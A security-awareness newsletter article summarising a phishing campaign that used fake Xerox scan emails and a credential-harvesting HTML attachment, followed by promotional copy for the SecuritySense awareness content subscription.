Anatomy of a Phishing Scam

Recently some hackers grew sloppy and exposed their tactics and results of a major phishing campaign.

The case, which was publicized by Check Point Research as an educational tool, offers a fascinating glimpse behind the scenes of a digital crime ring.

Like all phishing attacks, this one began with fraudulent email templates. In this case, the messages mimicked Xerox scan notifications and included a target company employee’s name or title in the subject line.

The bogus emails were sent through accounts that had been previously compromised so they would appear to be from legitimate sources. This is why you’re often warned that phishing attacks may appear to come from your boss—or your mom.

The payload

The attackers attached an HTML file containing embedded JavaScript code that had one function; it secretly conducted background checks of victims’ password use. When this snooping software detected credential input, usernames and passwords were harvested, and unsuspecting users were sent to legitimate login pages.

The key here is that in order for all this to take place, email recipients had to fall for the phishing message and click the HTML file. That’s a major error.

Apparently, though, it’s a mistake many people make—in this particular campaign, attackers successfully bypassed Microsoft Office 365 Advanced Threat Protection filtering and stole more than 1,000 corporate employees’ credentials, researchers noted.

Keep in mind that the world only learned of this phishing attack because the hackers failed to tie up a few loose ends, leaving a digital trail of their crime. That’s why it’s up to you to educate yourself about phishing, spotting the attacks … and never, ever clicking on links unless you’re certain of their legitimacy.

© National Security Institute, Inc.


Protect Yourself & Your Company From Cybercrime

Why shouldn’t your life be a little easier?

We want to make it super easy for you to market cybersecurity awareness to everyone at your company. We’re here to help you be more persuasive and support your work to make the entire company cyber-savvy.

Maybe you’re not a “marketer,” but you can be. You can get their attention with content that’s relatable, relevant, concise and enjoyable to read. We get feedback all the time from your peers who tell us their employees look forward to receiving SecuritySense. 

SecuritySense is a subscription-based content service that delivers you a consistent supply of fresh cybersecurity awareness content so you can easily maintain an ongoing cybersecurity brand awareness campaign

Our Unique Content Strategy

People pay attention to content they find personally relevant. SecuritySense  doesn’t feel like you’re being given extra work to do. It’s a blend of personal and work-relevant cybersecurity tips, warnings, human interest stories, instructions, news and insights that everyone looks forward to receiving. More about our content strategy

The Secret to Creating Awareness

Brand marketers know if you want to create awareness you have to do two things.  Steadily promote your message and make sure the message offers content that personally resonates with your audience. SecuritySense makes it easy for you to do both. 

Compare Our Per Employee Cost

Compare our per employee annual cost with the $8.00 – $20.00 seat licenses you might pay for training platforms. It’s a no-brainer to add SecuritySense to your overall program.
See pricing